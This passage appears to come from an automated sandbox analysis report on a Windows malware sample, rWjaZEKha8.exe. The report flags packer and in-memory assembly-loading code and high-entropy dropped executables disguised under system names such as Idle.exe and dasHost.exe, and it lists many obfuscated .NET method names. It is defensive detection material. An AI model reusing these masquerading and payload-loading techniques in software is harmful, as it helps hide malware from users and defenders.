            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rWjaZEKha8.exe
            Source: rWjaZEKha8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rWjaZEKha8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rWjaZEKha8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rWjaZEKha8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rWjaZEKha8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YLBOejLqkP7JJsWpVv2.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs.Net Code: LYpwiAcHeV System.AppDomain.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs.Net Code: LYpwiAcHeV System.Reflection.Assembly.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs.Net Code: LYpwiAcHeV
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs.Net Code: LYpwiAcHeV System.AppDomain.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs.Net Code: LYpwiAcHeV System.Reflection.Assembly.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs.Net Code: LYpwiAcHeV
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeFile created: C:\bridgehyperperfdhcp\__tmp_rar_sfx_access_check_4853375Jump to behavior
            Source: rWjaZEKha8.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018E28C push eax; ret 0_2_0018E2AA
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018CAC9 push eax; retf 0018h0_2_0018CACE
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018ED46 push ecx; ret 0_2_0018ED59
            Source: C:\Program Files\Windows Portable Devices\Idle.exeCode function: 21_2_00007FFD9BA100BD pushad ; iretd 21_2_00007FFD9BA100C1
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeCode function: 23_2_00007FFD9BA1555B push FFFFFFA6h; retf 23_2_00007FFD9BA15564
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeCode function: 26_2_00007FFD9BA100BD pushad ; iretd 26_2_00007FFD9BA100C1
            Source: intoDhcp.exe.0.drStatic PE information: section name: .text entropy: 7.0900740073665105
            Source: OjTEkrTlLyhdt.exe.4.drStatic PE information: section name: .text entropy: 7.0900740073665105
            Source: dasHost.exe.4.drStatic PE information: section name: .text entropy: 7.0900740073665105
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, r24LZy4QHpidDFkCsQa.csHigh entropy of concatenated method names: 'iUmYRxHw4w', 'sCgYk1kFuG', 'b1IYzhmyyc', 'fCq9N2Of9a', 'DnL9KFChv6', 'mqp94F9sVr', 'Rxx9wkneO5', 'x1i9YW0mZ9', 'dl199cEkEn', 'yULGokjGSBwMrj6YlWB'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.csHigh entropy of concatenated method names: 'MjvwfYwQEN', 'h1wwJpAX93', 'c97weX0bjb', 'BygwAvQL0u', 'PtNwsZEMnw', 'caPwau7jBk', 'dVIw0KXHby', 'kT5ttdQMIZg1CnAkq5w', 'C6L5JhQ1YEAWGL1q4e9', 'FtNtwHQk4JuAMpYZ0RT'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, nVquJeKGUTjuoIJSMi2.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'gPdJFqbbtmKlQVpquOJ', 'if6XaGboWSWgXkWWU1U', 'RAV5f2bBNk50o2QWxYM', 'n2lJAZb24JxoFPsKW9q', 'woZfLebUPMg4W4cTkiS', 'r3NM8hb9h1prhLFXGf1'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, bWLN9HtQo8gJCamdInO.csHigh entropy of concatenated method names: 'aWmFGxvijM', 'XXGFxK9F61', 'EDxFlkdPJV', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'qAUFbEnEOv'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, o885w0J7A2DeBmtaR8.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'iv5pteUrp', 'FeJP5cuwxLo2vPjeSGF', 'UAvJtnucsVoDQLhITVW', 'TxDolJuydCXOdF51q4D', 'Uhy75AuJ3NgYPf2XjDZ', 'CruhuFullWjSXlOPx9L'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, DPWe6c4gopBQINfxuNt.csHigh entropy of concatenated method names: 'qcSwRgDUfm', 'sFYwkHfTXd', 'YRSDvKXOZSLvJbO74GX', 'fgkOGMXL3ZgmocImB7Q', 'GpndjoX0UFGMomkl1rR', 'E5t121XSdYeGkXWX2ET', 'p1sS1LX17Kl3OKO9bKD', 'A1pH79Xk4JofNIALAXh', 'QwraUqXMWadgs7vSJUr', 'ASqdsqXVoGfZPUEYcqZ'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, RI2EQCwCpI4OqtvJw5K.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'eM2fLxb5ST', 'YBXxYEYFYS', 'GvNf2KEWFh', 'DQoBx5kQYKJDNIGpcBV', 'BP2wWakXavLNxiEEUSE', 'DyhZdQkTsf39X6fnpQn', 'OdD15kkj0usKNMrvuil', 'oORaZUkNhFAa3xTheik'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, BCLMDCK9pYnN7RImZR5.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'RMpIPPZ8f81KZGn6jab', 'x8nmTcZPLhxbO4iOCuJ', 'TsLqPnZp3vAOe0K2rOw', 'FSn98bZnCSBfqE289E3', 'WntnW3ZDpcXCsxOa6yZ', 'TrGmFAZxdISA9IrtUeZ'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, Fes99d4kqNHuWuy35JH.csHigh entropy of concatenated method names: 'DdYLc4M0wn', 'HsAEZofDg2PL8od42Yl', 'TLw0Iffpwf0QN01g1Sg', 'fWrnOGfn8l8KgWxF1At', 'l2ru6HfxhNgQ4GH8hUG', 'YiyuVSf6V7EHWdYbCbe', 'KyLLSdPtfM', 'TcuLVLI5Nn', 'tG7LE87t45', 'nh9LunyDDj'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, Bdahlet35SmMKQpTI6c.csHigh entropy of concatenated method names: 'hJRvEejeSJ', 'REkvuIwQev', 'AOdv3ai3nB', 'sRsvXqnqtL', 'Apiv6CHJRK', 'MeiK9jEKo5HETsP3aeK', 'tCsXgLEtIbQqewAwVnF', 'ETmB0XEsNsCPtKf2bHN', 'H8w7uEEzn39Lj9xxtoK', 'w3H9A9hdHAn6OkBX6mk'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, wPgMPSK7l0mbpWBIkjG.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'dcfWc0b3BtqJRmkLtgG', 'hgx0QKbqnf7CInChfZY', 'iaoOHTbYurjQARCOIFL', 'xb1GGkbguADGLByB1OO', 'cicElfbC4f06Urjs5gO', 'JFFJgvb7c6q4vbEQCXe'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, wPyUXMKwN9c5m768D22.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'pKQZctZgqRPnG1AhN6L', 'ginDgSZC9vfYLSVFD7l', 'sXOb5sZ7KG9BdgjLFVU', 'NivjtGZIxbjKWA3cE8l', 'jRqeEeZHGT2ikvr8FJN', 'vBrxCGZwnlGs0VyV70a'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, lA7HlDIjawGO1vOx0L.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'sj89P7ARSRrROiRwXl2', 'TaBSOVA8vJWyEiTvaES', 'ArqmF6APY7HG6TOvtfh', 'bVsQ55ApTL4WdbJvJdF', 'SwUDNCAnjwMq1DUZVmS', 'xT521uADMYHXDZfTGIL'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, CIOsQFKFmvdpXx5bITV.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'xRKYYDosaauZqBTQpVD', 'YOygJGozv5dvX3WDhdO', 'zQs4yjBdjayWQ8WQuRF', 'DDM2ywBirWnnQxRFxKB', 'eTd9G9BuJ2fJBGwiAdG', 'w11w58BW6uriHl2VlLA'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, BDjb3CtZ6iRFa55VmSp.csHigh entropy of concatenated method names: 'nPDDX1GB06', '_1kO', '_9v4', '_294', 'cZrD6Rpf8S', 'euj', 'o5GDn6BSM0', 'IwiDcfb19Q', 'o87', 'j9dDvdDIw4'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, y4wiaGKId3Y5FrDxZbK.csHigh entropy of concatenated method names: 'XAm4VJpVYl', 'PMlM7Z9Z6I4AWsy892W', 'FhwlDw9beS6XTFUhEnE', 'l1P9cl9rXpnhS1N7M2J', 'qJgX2j9A9O93kx9sXtR', 'OjndBK9of3ttQsqfqRI', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, qP89XCKrlNUl5qIMhcN.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'sgKQ6cUnTWDocBjpheO', 'QaeBN3UD1kchQ4NPUfV', 'DNZA4eUxgmSK8dj3IT3', 'q0WygPU6LHdqX91nL9P', 'aVgPIvUvIAmhjtjryHJ', 'HvQMJ2UGSlaehuA3Mj0'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, LW9BFAKUW42jKRlu6oc.csHigh entropy of concatenated method names: 'h2UKh0oKkv', 'Fvqjuu2uOQwFuTxogoV', 'IaAO9K2WUfZy11KuIbX', 'XkF52C2ddgVa8X04sUD', 'HqUwbT2i1VJqHWCvFbs', 'evEBLi2roIuN0IGrv7s', 'Win6WT2AhalkVuWW3il', 'bCk0sx2ZCJUruo5wdpU', 'Y4rKPrAAJu', 'YeoToU2BgTsPBGkpiFM'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, EPoxNNtdARXpPAtCYhc.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'N4BDGrFQrL', 'CetDxV9632', 'xULDlMHywH', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, LjVuW49027yEi9DjJsj.csHigh entropy of concatenated method names: 'KDJy46JAhyg6SpYqmR9', 'pGaSukJZetPAasgFLO2', 'PgVdRxJWuhJX7RqlTUe', 'YNQZhtJrqGLxA0FdxpQ', 'bjSCR4Jb5RZaluOgWDC', 'Gfc1hoJoEnrVM53TSWM', 'B73jm0JBoA3u9KTRgtB'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, nLvgk4HrrAAJuEVtMT.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'xLUkLqATt0MpiBH7Bpi', 'npal1SAjZIp80D4VYco', 'ctbjCCANSkx6LttIdr4', 'RW1aquA4Li4S61gdpfs', 'WcUAd4AfA1dvX610Qd9', 't8nmTlAOoclD8VRYdVV'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, kPNvYn9ka75kqfAqP0i.csHigh entropy of concatenated method names: 'YmKcyaSiJi', 'Qi3cQrFqBt', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'L9OcDHtmf2', '_5f9', 'A6Y'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, i9fo4UvKZPtFtHQVUZ.csHigh entropy of concatenated method names: 'eU2eayqCp', 'e8gA580VZ', 'Ql2srimO2', 'uMI70biJfQ56u46NWTn', 'eGTAZDic9sLZCj7NFna', 'HiG0CNiyqpxkBUgNws2', 'idYflDilaEc69TBBykk', 'pYev2XiEgWjAW0KlSkR', 'fEckZ0ihPyIoBZ6qmQK', 'xsoFfeiejyc8pqca5YW'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, RphICuY7gnL9SJ8sf8E.csHigh entropy of concatenated method names: 'k9RbAZuWAa', 'rPybsBfsil', 'rbPbaNvYna', 'l5kb0qfAqP', 'Ji3b1whsEq', 'vnik50Vsc3g2SP3hVDc', 'bTwAHIVz6AmgYIHpWcM', 'eNnDsgVKFDFEOloQZQJ', 'Qv4QFXVtMSQsx8Uooic', 'X1OO2w5d2VfflQSlQWI'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cUWl0bKa1PkIONmc83V.csHigh entropy of concatenated method names: 'cGOKR1vOx0', 'XqmrsD2yf5VsxtAnB7N', 'mQ6rk22JnqJBwWxDbKn', 'UZQkdt2w2JIBx9IS3st', 'jLFNKD2cOhW2TRLXL8G', 'qKS5lh2lGe2xQt4sMic', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, lJr3yQw7IUhFxTtgNgl.csHigh entropy of concatenated method names: '_223', 'HD3nab04PPArcxpHOce', 'toMkIa0fTEMy95WKj12', 'BxnaeA0OVMMqJ8F4x0I', 'xqKbyS0LXq3PtXuSbkw', 'YlESLO00RFJljDZqIym', 'N32uvv0SASDWCn7dlo8', 'zjbfN701xTtLDrVubGq', 'JM7X7s0khOXSfUqQfXY', 'gNhsBi0MAI7ag8vSnm1'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, JeW31E4ih8FEvPovpfL.csHigh entropy of concatenated method names: 'Y0SwI2Rsc8', 'PXksg3XWPGOXU8XFBuT', 'zHyKttXrTKC91QYLhoN', 'y12u1EXixRlvpG9lFK3', 'X9GOfxXu9NClDNeEiQ1', 'W4JKfcXAYcdyeBgOy6F', 'A95vkQXZgA9d2mpteH9', 'Y71M05XbgdiXXPnjrnF', 'KQ0kFqXo00tJORnWAim', 'Wt80xjXBsFZQnWkCPAW'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, sJxheyYgI8YLGpnjFLC.csHigh entropy of concatenated method names: 'kD47YC24vv', 'aQ179ccgTf', 'v767thauSM', 'DnhMsD5NiWqxxCQobqu', 'GiYyHu54c8dMelfVwIc', 'MHM9ii5TIpJCQOJHojv', 'tehmj55jIfX8Wp0loYc', 'v3YlGg5fqbDKvEQlBOD', 'GE3flU5OKcPWi5GEPXY', 'AlX35S5LGj93ZO44o3k'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, V4PONt9UXlh4aGvZ5uk.csHigh entropy of concatenated method names: 'sajnP5rsbo', 'LT9nohGTSn', 'TiQnZM6JEb', 'ojsmQGyE0Ma2gp5EkU8', 'vjYMojyJW6d89EpdNiX', 'Rn0jcqylrYcgn1p79Jg', 'lMoINXyhb2PQXCUPel6', 'NQt5fMyeiuYBC4LNXZN', 'bPNKibyFlplxPyb7rB3', 'DAEdLyyRu2a4HbyJDLx'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, EJO4AlBlMXd5IUKlVX.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'lTrgpErUTIHhXj21Qq5', 'Uxb75Rr9R7clkbUvYgr', 'cgWMGdra4NAME5E473n', 'mkdaVXrQY6Y5hwdPWtR', 'GRtUvArXeiY15ZoubSF', 'uGVhRarTwhjYFEVSPGJ'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, XgL7TrasktPKFsDZHY.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'HCouryWcwiHOU4ogq87', 'vPJW8lWyGNU7HUQLLUt', 'GFXEQRWJ0CQhtTTODTO', 'ykuPfEWloVlcIZ9WmCy', 'CYWgIRWE3K0Gbe6LDjD', 'RhXossWhjUvSuYiylDl'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, HUl3sT9FQ4feXrrLWrg.csHigh entropy of concatenated method names: 'LBQn0gOFU9', 'cDgn1V0r6e', 'oipnOtpuoQ', 'cpZnBLSPH8', 'xxvnprjD2h', 'FYUg2KyqBbpaMmYFJxX', 'fF7XsPy5P8kxosCmQiH', 'B04LFgy3AjsjAapfwBj', 'MQ8XSEyY7KdnrwhVLxU', 'vyN2qBygHvV2YmU3vxl'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, fqvPs5wrYhlqGQmK3DC.csHigh entropy of concatenated method names: '_269', '_5E7', 'cgEfiETYp3', 'Mz8', 'n7ffmlkMRA', 'j69e4Jkx4Y5UVg0jVJL', 'hvyQdck65QPZKnFE79i', 'JgIfOckvOcO3ATH2ZKZ', 'NwxbOrkG6gC3XHMwiYv', 'ayS93QkmjcdOptwBFov'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, j4xcydKK5VtqVUDV8RS.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'hTtb7cZO2SVtVcbHH30', 'PtRHXlZLGXk0pOqivP2', 'kMoROkZ0UdCYPrqv6k0', 'Bc07KlZSgfoVc9wAm0t', 'krCfD1Z1j26eHnoLpdW', 'FyO8GBZkXwevqeWjOBE'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, kg8olyYr0HoZuL6rYsH.csHigh entropy of concatenated method names: 'GXxiRYrg11', 'yQAieY51mZ', 'a5kiAxMBlF', 'hENisxM2DR', 'w7BiaPfSX7', 'dQci0BoY2f', 'uWCi1a0A8J', 'CKeiOnYynN', 'mmliBdhLhD', 'BbLipVfnJI'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, d98lCZ1LM07kEZ3Rpd.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'gUVxpyWmSdoWYt5QWZT', 'ONmvtuWKFCRpCkHJXm7', 'INaWHdWtnynF0jpP8xS', 'nRY7COWsKyxjQtUs2Sq', 'MgXGmZWzFf37vmkg2FW', 'QshUARrdi5frfSxNnxa'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, gjDxjSoOELZk0VVE5c.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'kxZvAhAZpGH3CkxCSvf', 'zB4TBnAbbKEoygVuteZ', 'Hf0pU0AoNRndOKuKRFP', 'JoJ5IqABUT70D5DuApc', 'rtiD3QA2gQ7RTBnYMYS', 'EZBQnKAUXDscinjrVFq'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, XdL8ICwdMV7ugDcUVUJ.csHigh entropy of concatenated method names: '_5u9', 'bZifY7dtRr', 'yjBxN8c0hM', 'sq5f9Adw1E', 'WHA5iF1KJqmgXDmoaD9', 'mxTLff1t7wHlD74lghD', 'QlgUe01swdmpgDl9cLj', 'TbuDDa1G2t0iw2OpUXn', 'VA3dxl1m7lCV3Blff6k', 'qA0RZj1zYqUokDtPK8C'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, Y5VUCqwmQItPBkuVxEw.csHigh entropy of concatenated method names: 'yl52oCq0sK', 'T7Z2Z5ODDV', 'gRv2HR5TOu', 'jnTOPv08ZCHOGWUQrTD', 'BOwapl0P0oxchpn3uMx', 'aC2vy40p6NCh3xMTvjj', 'G5kL470nx0OfdCUdOQX', 'T1F8Va0Dkg0dKfCkAme', 'LOauH20xIJmKoMJjmo3', 'pTk9RR06gb43IjQtedj'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, e7X0bjKObQygvQL0uCt.csHigh entropy of concatenated method names: 're84Kay4YD', 'OAc44wHPrs', 'jlu4wEH08f', 'ALfMLi2xn0JmyXEQ9Jm', 'CPvbLn26ymRp3nHihAF', 'OQo3vN2n1FrJq7tBryc', 'mpFB7m2DHfq5oI4f8Hx', 'rdxYEr2vBl22FHmruTo', 'Wrl6w02GbLvTOmXd8sA', 'SWDxBl2mhFQSynnYTLt'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, Ri1n4ywHA0e9Ch4G8em.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'BMLxl3FmQX', 'R06f7HpZAi', 'PZJxbTLNWZ', 'xhafqfS9Qr', 'aZLJkQkJ3UCJ4PPrxjB', 'nAL4bvklMG2CV751TqC', 'y9DvEZkc0Bgc0JLSWg7'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, j5PZxWtJmVFfONBGEgd.csHigh entropy of concatenated method names: 'upYLKUFrjwg8HWlqix6', 'kayjR5FAFX7Xx4LJFOM', 'MnlLmiFu4CWIY81TyQZ', 'tZ7flYFW4RV6FbdDori', 'H40FeQDq5I', 'WM4', '_499', 'CnGFA7FLrV', 'ij0Fs9nkE2', 'E6eFatPZN2'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, ISgfIbKeJG2iyu8LxkB.csHigh entropy of concatenated method names: 'fMQKrFAuv1', 'nMo4QL2M10HIdoVBiMk', 'z3c9OP2VlUBcCMgkDSd', 'tE5DqC21XRZXUEFZyPk', 'AQgNqW2kIh7ykbuTMn6', 'Ilp26825KaP3uEEXeVl', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cW6JfMtNAY691bDVIIZ.csHigh entropy of concatenated method names: 'eCmcht7mac', 'bmScCBxNRh', 'mJkcP0yx35', 'oHacob1OlI', 'CckcZy11tH', 'wc4cH43uNI', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, QXbtIEwoRMueNctCyUn.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'hgdfxeDvHG', '_168', 'PhNLxSkVhxjMT8q24Sx', 'hJaOL8k5QFokUxqDtPs', 'ECJ6ghk3Hp0GKSGgd1e', 'TGchEWkqfsBvT8huTKc', 'RsdXyKkY32d2huCssTK'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, OcWrkrYFp7BkQGlk5AU.csHigh entropy of concatenated method names: 'C9TqJ3tpYE', 'ytDqekScWC', 'PTwqAkwehu', 'PoWqsYhnFG', 'xYvqa2S8u1', 'YdNXZy3OFBsxtt9nSmQ', 'qIkCed34XCkwOmo1Vme', 'T0Y6fv3fPWsdhVIudFF', 'H1PY5j3LE2Nvq5dSwuu', 'V6LcnP30a75QiZSLr3T'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, ib9Rxr9GD2KrDcRL7p4.csHigh entropy of concatenated method names: 'uCunE4U4lA', 'wnDnuvMPeR', 'FISZyccvtrYfVEyKACW', 'SUavZYcGRdUxmdo1jwO', 'eUCVQ8cmUP9gUw2skyJ', 'B51EfXcKfHjxIDSFdbK', 'Mv84E7ctmlm8VS646V7', 'GQm4H5csA2rJIB1pVtw', 'kJw64OcztBbG3mDG9Fk', 'MEPj5uydGp67kn6LXKK'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, yTmaGN4aVx38Eeq0abH.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'lDE9ebJo9x', 'mSI9AkvTma', 'iNV9sx38Ee', 'm0a9abHeBY', 'paR90HtV4a', 'dNkWgk4BvUgXq33VNxO', 'IZsl2B42RPKyO8DvxlK', 'eUyBb04bFvwSIZi63Zv'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, d3Bfq1wK08MX2xplcdx.csHigh entropy of concatenated method names: 'MRSLD8bCNB', 'mi9LUvJp9F', 'aGfL5XvIv4', 'rVWLfweDkD', 'H7dsG4fzu3Cs3VoTWc2', 'uYTox9ftYL15cwPi6aJ', 'tr6VGffsCtbtIXNS9QW', 'EUDk5POdYEDbKn8wJuC', 'Huk49UOisa1wm4s6lch', 'lB0WelOufOTPxH8cceM'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, m6I4F09Tv3FUXfFNVNQ.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.csHigh entropy of concatenated method names: 'FavYKA85LT25cohOpC1', 'deCiKt83YJkKoWJvysj', 'ekiSnC8M39N8PChCJog', 'ruLg3e8VtmnDlCS7fh2', 'd4k5iW5lLi', 'BJETM88gKiXGqdHuiS8', 'UKwxux8CeQ3fZSuMBLQ', 'wQFsOQ87ROoHUGcHGVf', 'v8S8Jh8ILeKLfwLqLBQ', 'SDTke28HsUEu0QSZTuu'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, SDQKnf9WWobfVncM3BG.csHigh entropy of concatenated method names: 'xqpcYic3hO', 'AVtc9OAsln', 'CBIctOW1n3', 'jiEcLuC0y3', 'R8oc2Quye4', 'V3ncGc2xPj', 'gcccxsFVKe', 'TPXcli1mNE', 'jnkcbvAU9v', 'fH7c760Bs7'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, nqE6hYKCLfZlyNuHnnq.csHigh entropy of concatenated method names: 'kQs4lJS9Bd', 'CxE4bTpt5a', 'xKRCokU9dmYGlJc7fQT', 'MclmWyU2NngL0XUcKfA', 't55E7SUUp3nactniC2u', 'faVQHiUaxBgtxOJA5dw', 'J3uVUZUQDWsZ5kSEkfM', 'Lswm64UXPL6G8xocje5', 'xwXoSRUTkb2pQVlAovj', 'QOPB2iUjlrfq7fblHnb'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, NDJLJa9fOLFrxKxlxHf.csHigh entropy of concatenated method names: 'gnknT4fsSb', 'D7pnrn3wqc', 'wxnnWOL3TU', 'BWYnIqgTaT', 'ODxnjRwkTi', 'KQmnRffHii', 'YoenjAypxwd1QmRhJxY', 'vP337iy8U7pVDZNgY4w', 'va58QgyPXClFwDlaKul', 'C1teqXyn5TQLSTfGx73'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, zln0v9zj48nrn2xpCm.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'yAdmUXZWbPSBGd4Dadj', 'fMSCgEZrZwrUG6VoIvk', 'kODE6SZAGNU3GiCWPZ8', 'eiRWUyZZISQWLHjZ6ve', 'M9Ayq8ZbhjPaKg7dXgp', 'PNh1sfZoxxW2xseuriS'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, HmSwjI44bRSTROfBEhh.csHigh entropy of concatenated method names: 'BiO4PA0ysD', 'TyD4o5aUXj', 'Om74ZBPw1q', 'oFA4H1dNow', 'IF34T1twni', 'Acm4rweZ44', 'hdbmbka4AkegXB6aqvd', 'KZBdr4affJq4mPBvNRW', 'tCjVfTajm7XrHUPEKfT', 'NJd92jaNPBNTtHNTPEq'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, vAsTKa5jeTRg34PDix.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'Gyx1mUcAN', 'JX4ZTvuOVRUh5DAXcN2', 'UamgWNuLbnXVImiTrXa', 'ecRpy7u0jSAiBKZSh2m', 'LeXw0FuSxqvbX747TQH', 'yML6Wgu1OBrSQ3w3aTx'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, NZtiqMKMdA21pY0Fs1d.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'ACTHuEod0cObiDhtUxN', 'PfdSKEoiqeYp9blJeCN', 'rhv47aou9LET4xYCXlw', 'BeIFwxoW925FyfieQkh', 'DdCXvhorm1G9IfiLH3W', 'zZyDhNoA74ZjZxekHgQ'
